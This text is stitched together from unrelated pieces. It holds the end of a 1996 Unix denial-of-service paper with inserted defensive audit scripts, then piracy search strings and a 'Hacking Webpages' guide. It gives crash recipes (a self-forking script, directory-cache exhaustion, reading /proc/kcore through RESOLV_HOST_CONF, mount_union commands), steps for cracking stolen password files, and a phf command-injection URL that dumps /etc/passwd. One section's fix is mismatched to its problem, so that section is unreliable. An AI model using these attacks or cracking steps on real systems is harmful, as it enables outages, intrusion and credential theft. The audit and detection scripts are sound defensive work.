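# Remove a file by inode number, for names that cannot be typed at all
# (control characters, trailing spaces). -xdev keeps find on one filesystem,
# where inode numbers are unique.
remove_by_inode() {
    find "$1" -xdev -inum "$2" -exec rm -f -- {} \;
}

# Build a scratch directory of awkward names, clean it, report what is left.
demo_cleanup() {
    scratch=$(mktemp -d) || return 1
    : > "$scratch/-xxx"                      # names from the text
    : > "$scratch/"'xxxxxxxxx!'
    : > "$scratch/odd name with spaces"      # constructed
    remove_by_name "$scratch" '-xxx'
    remove_by_name "$scratch" 'xxxxxxxxx!'
    remove_by_name "$scratch" 'odd name with spaces'
    : > "$scratch/$(printf 'tab\there')"     # constructed, hard to type
    inode=$(ls -i "$scratch" | awk 'NR == 1 { print $1 }')
    remove_by_inode "$scratch" "$inode"
    left=$(ls -A "$scratch" | wc -l)
    rmdir "$scratch" 2>/dev/null || :
    echo $((left))
}

echo "files left after cleanup: $(demo_cleanup)"
```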

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file with a vnode. But DNLC can only
operate on files with names that have fewer than N characters (for SunOS 4.x
up to 14 characters, for Solaris 2.x up to 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create, let's say, 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.

.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.

Ex:

|I /bin/csh
nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs create files in /tmp, but are unable to deal with the problem
if the file already exists. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is, we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read into the variable and accessed through ping.

Ex:

$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------

Thanks to Mr David Honig for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------

ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, the
passwd file will be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota, the process will go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.


.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dump things don't really belong in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:



.E.3. CORE DUMPED UNDER WUFTPD
------------------------------

A core dump can be created under wuftpd with two different
methods:

(1) When pasv is given (user not logged in (ftp -n)). Almost all
versions of BSD's ftpd.
(2) More than 100 arguments are given with any executable
command. Present in all versions of BSD's ftpd.

.E.4. ld UNDER SOLARIS/X86
--------------------------

Under Solaris 2.4/X86 ld dumps core if given the -s option.


.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.F.1. BASIC SECURITY PROTECTION
-------------------------------

.F.1.1. INTRODUCTION
--------------------

You cannot make your system totally secure against denial of service
attacks, but for attacks from the outside you can do a lot. I put this
work list together and hope that it can be of some use.

.F.1.2. SECURITY PATCHES
------------------------

Always install the proper security patches. As for patch numbers
I don't want to put them out, but that doesn't matter because you
want to check that you have all security patches installed anyway,
so get a list and check! Also note that patches change over time and
that a solution suggested in security bulletins (e.g. CERT) often
is somewhat temporary.

.F.1.3. PORT SCANNING
---------------------

Check which services you have. Don't check with the manual
or some configuration file; instead scan the ports with sprobe
or some other port scanner. Actually you should do this regularly to see
that no one has installed a service that you don't want on
the system (it could for example be a service used for a pirate site).

Disable every service that you don't need, which could for example be rexd,
fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,
tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime
and chargen can be made to loop. There is however no need
to turn discard off. The discard service will just read a packet
and discard it, so if you turn it off you will get more sensitive to
denial of service and not the opposite.

Actually, services can be found on many systems that can be used for
denial of service and brute force hacking without any logging. For
example stock rexec never logs anything. Most popd's also don't log
anything.
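
Once the port scan has shown what is open, the entries to comment out have to be found. The following is an added example, not part of the original paper: it lists the enabled entries of an inetd.conf-format file that are on the disable list above, assuming the services are started from inetd; the sample configuration is constructed.

```shell
#!/bin/sh
# Added example: list enabled inetd.conf entries the text says to disable.

# Reads inetd.conf-format text from the named files (or stdin) and prints
# "service protocol finding" for each enabled entry on the disable list.
audit_inetd() {
    awk '
    BEGIN {
        # Names as given in the text, plus finger and uucp, the service
        # names fingerd and uucpd usually run under (an assumption).
        list = "rexd fingerd finger systat netstat rusersd sprayd pop3"
        list = list " uucpd uucp echo chargen tftp exec ufs daytime time"
        n = split(list, w, " ")
        for (i = 1; i <= n; i++) risky[w[i]] = 1
        # The four services the text says can be made to loop.
        n = split("echo chargen daytime time", w, " ")
        for (i = 1; i <= n; i++) loops[w[i]] = 1
    }
    /^[ \t]*#/ || NF < 6 { next }    # commented out (disabled) or not an entry
    {
        svc = $1
        sub(/\/.*/, "", svc)         # RPC entries: "rusersd/2-3" -> "rusersd"
        if (!(svc in risky)) next    # discard and needed services pass
        print svc, $3, ((svc in loops) ? "loop-capable" : "disable-unless-needed")
    }' "$@"
}

# Constructed sample configuration, not taken from a real host.
sample_inetd_conf() {
    cat <<'EOF'
# <service> <socket> <proto> <flags> <user> <server> <args>
ftp      stream  tcp  nowait  root  /usr/sbin/in.ftpd   in.ftpd
echo     stream  tcp  nowait  root  internal
echo     dgram   udp  wait    root  internal
chargen  dgram   udp  wait    root  internal
discard  dgram   udp  wait    root  internal
#daytime dgram   udp  wait    root  internal
tftp     dgram   udp  wait    root  /usr/sbin/in.tftpd  in.tftpd -s /tftpboot
rusersd/2-3 dgram rpc/udp wait root /usr/lib/netsvc/rusers/rpc.rusersd rpc.rusersd
EOF
}

sample_inetd_conf | audit_inetd
```

On a real host the function is called with the path of the configuration file as its argument.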

.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
---------------------------------------------------------

Check the attacks described in this paper and look at the
solutions. Some attacks you should perform yourself to see if they
apply to your system, for example:

- Freezing up X-Windows.
- Malicious use of telnet.
- How to disable services.
- SunOS kernel panic.
- Attacking with lynx clients.
- Crashing systems with ping from Windows 95 machines.

That is, stress test your system with several services and look at
the effect.

Note that Solaris 2.4 and later have a limit on the number of ICMP
error messages (1 per 500 ms I think) that can cause problems when
you test your system for some of the holes described in this paper.
But you can easily solve this problem by executing this line:

$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0

.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
--------------------------------------------------------

Check the inside attacks. Although it is always possible to crash
the system from the inside, you don't want it to be too easy. Several
of the attacks also have applications besides denial of service,
for example:

- Crashing the X-Server:     If stickybit is not set in /tmp
                             a number of attacks to gain
                             access can be performed.

- Using resolv_host_conf:    Could be used to expose
                             confidential data like
                             /etc/shadow.

- Core dumped under wuftpd:  Could be used to extract
                             password-strings.

If I haven't put out a solution I might have recommended some other paper.
If not, I don't know of a paper with a solution that I feel I can recommend.
In these cases you should check with your company.
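
Two of the inside attacks come down to file permissions: a shared directory without the sticky bit (.D.2) and set-uid helpers (.D.13, .D.15). The following is an added example, not part of the original paper, that checks for both and applies the chmod u-s fix the paper gives; the function names and the scratch tree are constructed for the illustration.

```shell
#!/bin/sh
# Added example: permission checks behind sections .D.2, .D.13 and .D.15.

# World-writable directories without the sticky bit: any user may delete
# another user's files there, which is how the X server socket in /tmp
# gets removed. Errors from unreadable directories are ignored.
unsafe_shared_dirs() {
    find "$@" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null || :
}

# Set-uid files: each one runs with its owner's rights for whoever starts
# it, so every entry should be there on purpose.
setuid_files() {
    find "$@" -xdev -type f -perm -4000 -print 2>/dev/null || :
}

# Apply the fix the text gives for such helpers: drop the set-uid bit.
drop_setuid() {
    chmod u-s "$1"
}

# Constructed scratch tree standing in for a real filesystem.
demo_audit() {
    root=$(mktemp -d) || return 1
    mkdir "$root/shared_ok" "$root/shared_bad" "$root/private"
    chmod 1777 "$root/shared_ok"      # like a correctly configured /tmp
    chmod 0777 "$root/shared_bad"     # sticky bit missing
    chmod 0755 "$root/private"
    : > "$root/helper"; chmod 4755 "$root/helper"
    : > "$root/plain";  chmod 0755 "$root/plain"
    echo "unsafe: $(unsafe_shared_dirs "$root" | sed "s|^$root/||")"
    echo "setuid before: $(setuid_files "$root" | sed "s|^$root/||")"
    drop_setuid "$root/helper"
    echo "setuid after: $(setuid_files "$root" | wc -l | tr -d ' ')"
    rm -rf "$root"
}

demo_audit
```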

.F.1.6. EXTRA SECURITY SYSTEMS
------------------------------

Also think about whether you should install some extra security systems.
The basics that you should always install are a logdaemon and a wrapper.
A firewall could also be very good, but expensive. Free tools that can
be found on the Internet are for example:

TYPE:       NAME:          URL:

LOGDAEMON   NETLOG         ftp://net.tamu.edu/pub/security/TAMU
WRAPPER     TCP WRAPPERS   ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL    TIS            ftp://ftp.tis.com/pub/firewalls/toolkit

Note that you should be very careful if building your own firewall with
TIS or you might open up new and very bad security holes, but it is a very
good security package if you have some basic knowledge.

It is also very good to replace services that you need, for example telnet,
rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be
found at URL:

ftp://ftp.cs.hut.fi/pub/ssh

The addresses I have put out are the central sites for distributing
and I don't think that you should use any other except for CERT.

For a long list of free general security tools I recommend:
"FAQ: Computer Security Frequently Asked Questions".

.F.1.7. MONITORING SECURITY
---------------------------

Also monitor security regularly, for example through examining system log
files, history files... Even in a system without any extra security systems
several tools can be found for monitoring, for example:

- uptime
- showmount
- ps
- netstat
- finger

(see the man text for more information).

.F.1.8. KEEPING UP TO DATE
--------------------------

It is very important to keep up to date with security problems. Also
understand that when, for example, CERT warns about something it has often
been dark-side public for some time, so don't wait. The following resources
that help you keep up to date can for example be found on the Internet:

- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.

- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.

- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.

.F.1.9. READ SOMETHING BIGGER AND BETTER
----------------------------------------

Let's start with papers on the Internet. I am sorry to say that there are
not very many good free papers to be found, but here is a small collection
and I am sorry if I have overlooked a paper.

(1) The Rainbow books are a long series of free books on computer security.
US citizens can get the books from:

INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meade, MD 20755-600

The rest of us just have to read the papers on the World Wide Web. Not
every paper can be found on the Internet, however.

(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't know anything about
computer security you can't find a better start.

(3) "The WWW security FAQ" by Stein is, although it deals with W3-security,
the very best paper on the Internet about computer security.

(4) CERT has also published several good papers, for example:

- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.

I think however that the last paper has overlooked several things.

(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".

(6) Also see section ".G. SUGGESTED READING"

You should also get some big good commercial book, but I don't want
to recommend any.

.F.2. MONITORING PERFORMANCE
----------------------------

.F.2.1. INTRODUCTION
--------------------

There are several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on the Internet.

.F.2.2. COMMANDS AND SERVICES
-----------------------------

For more information read the man text.

netstat   Show network status.
nfsstat   Show NFS statistics.
sar       System activity reporter.
vmstat    Report virtual memory statistics.
timex     Time a command, report process data and system
          activity.
time      Time a simple command.
truss     Trace system calls and signals.
uptime    Show how long the system has been up.

Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.

.F.2.3. PROGRAMS
----------------

Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/

Top: Top might be a simpler program than Proctool, but is
good enough.

.F.2.4. ACCOUNTING
------------------

To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time and memory each program uses. You should
check your manual to see how to set this up.

You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:

- netstat
- iostat -D
- vmstat


.G. SUGGESTED READING
~~~~~~~~~~~~~~~~~~~~~

.G.1. INFORMATION FOR DEEPER KNOWLEDGE
-------------------------------------

(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol. RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol. RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol. RFC 951, 1985.

Many of the papers in this category are RFC-papers. An RFC-paper
is a paper that describes a protocol. The letters RFC stand for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice RFC
index search form at URL:

http://pubweb.nexor.co.uk/public/rfc/index/rfc.html

.G.2. KEEPING UP TO DATE INFORMATION
------------------------------------

(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailing list. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from:
    - comp.security.announce
    - comp.security.unix
    - comp.security.firewalls
(6) Various 40Hex Issues.

.G.3. BASIC INFORMATION
-----------------------

(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books:
    - Teal Green Book (Glossary of Computer Security Terms).
    - Bright Orange Book (A Guide to Understanding Security Testing
      and Test Documentation in Trusted Systems).
    - C1 Technical Report-001 (Computer Viruses: Prevention,
      Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizon, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.

.H. COPYRIGHT
-------------

This paper is Copyright (c) 1996 by Hans Husman.

Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.

.I. DISCLAIMER
--------------

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.













Google secrets

method 1
www.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory; change it to what you want and you will get a lot of stuff.

voila!

method 2
www.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Hacking Webpages

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need to learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.
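
For an administrator, the distinction drawn above is something to audit. The following is an added example, not part of the original text: it reads a passwd-format file and reports accounts whose hash is readable, accounts with no password, extra uid 0 accounts and malformed lines. The sample reuses lines from the listings above plus one constructed entry (guest); the finding names are chosen for the illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the weaknesses discussed above.

# Prints "account finding" lines:
#   hash-exposed    password field holds a hash any local user can read
#   empty-password  no password at all
#   extra-uid0      a second account with the uid of root
#   malformed       wrong field count or non-numeric uid/gid
audit_passwd() {
    awk -F: '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    NF != 7 || $3 !~ /^[0-9]+$/ || $4 !~ /^[0-9]+$/ {
        print $1, "malformed"; next
    }
    $2 == ""                                { print $1, "empty-password" }
    $2 != "" && $2 != "x" && $2 !~ /^[*!]/  { print $1, "hash-exposed" }
    $3 == 0 && $1 != "root"                 { print $1, "extra-uid0" }
    ' "$@"
}

# Sample input: lines from the listings above, plus one constructed entry.
sample_passwd() {
    cat <<'EOF'
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
smtp:x:0:0:mail daemon user:/:
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
guest::1300:20:constructed entry:/tmp:/bin/sh
EOF
}

sample_passwd | audit_passwd
```

The smtp line from the listing is reported because it shares uid 0 with root, and the ftpadmin line because it has only six fields.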

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system.

1. The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker.
Although it's nearly impossible to find a good cracker there are a few ok
ones out there. I recommend that you look for Cracker Jack, John the Ripper,
Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a
dictionary file... When you start a cracking prog you will be asked to find
the password file. That's where a dictionary maker comes in. You can
download one from nearly every hacker page on the net. A dictionary maker
finds all the possible letter combinations with the alphabet that you
choose (ASCII, caps, lowercase, and numeric letters may also be added). We
will be releasing our password file to the public soon, it will be called,
Psychotic Candy, "The Perfect Drug." As far as we know it will be one of
the largest in circulation.

3. You then start up the cracker and follow the directions that it gives
you.


The PHF Technique

Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).
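
Requests of this shape stand out in a web server's access log. The following is an added example, not part of the original text: it scans Common Log Format lines for requests to /cgi-bin/phf and reports whether the query carried an encoded newline and whether the server answered with a 2xx status. The log lines are constructed and use documentation address ranges; the output labels are chosen for the illustration.

```shell
#!/bin/sh
# Added example: find phf requests in a web server access log.

# Input: Common Log Format lines from the named files (or stdin).
# Output: "client status kind outcome" for every request to /cgi-bin/phf.
#   kind     newline-injection when the query carries an encoded newline
#            (%0a or %0d), otherwise phf-access
#   outcome  served when the status is 2xx (the script exists and ran),
#            otherwise refused
detect_phf() {
    awk '
    {
        uri = tolower($7)                 # field 7 is the request URI
        if (uri != "/cgi-bin/phf" && index(uri, "/cgi-bin/phf?") != 1) next
        kind = (uri ~ /%0[ad]/) ? "newline-injection" : "phf-access"
        outcome = ($9 ~ /^2/) ? "served" : "refused"
        print $1, $9, kind, outcome
    }' "$@"
}

# Constructed log lines; the addresses are documentation ranges.
sample_access_log() {
    cat <<'EOF'
192.0.2.10 - - [14/Jul/2008:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 2048
198.51.100.7 - - [14/Jul/2008:10:01:09 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 210
198.51.100.23 - - [14/Jul/2008:10:01:11 +0000] "GET /cgi-bin/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
203.0.113.4 - - [14/Jul/2008:10:02:00 +0000] "GET /cgi-bin/phf HTTP/1.0" 404 210
192.0.2.10 - - [14/Jul/2008:10:03:00 +0000] "GET /cgi-bin/phfinder?q=1 HTTP/1.0" 200 99
EOF
}

sample_access_log | detect_phf
```

A line marked served means the script is still installed and answered the request, so that host needs the script removed and its password file treated as disclosed.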

The best way to get root is with an exploit. Exploits are explained in the
next chapter.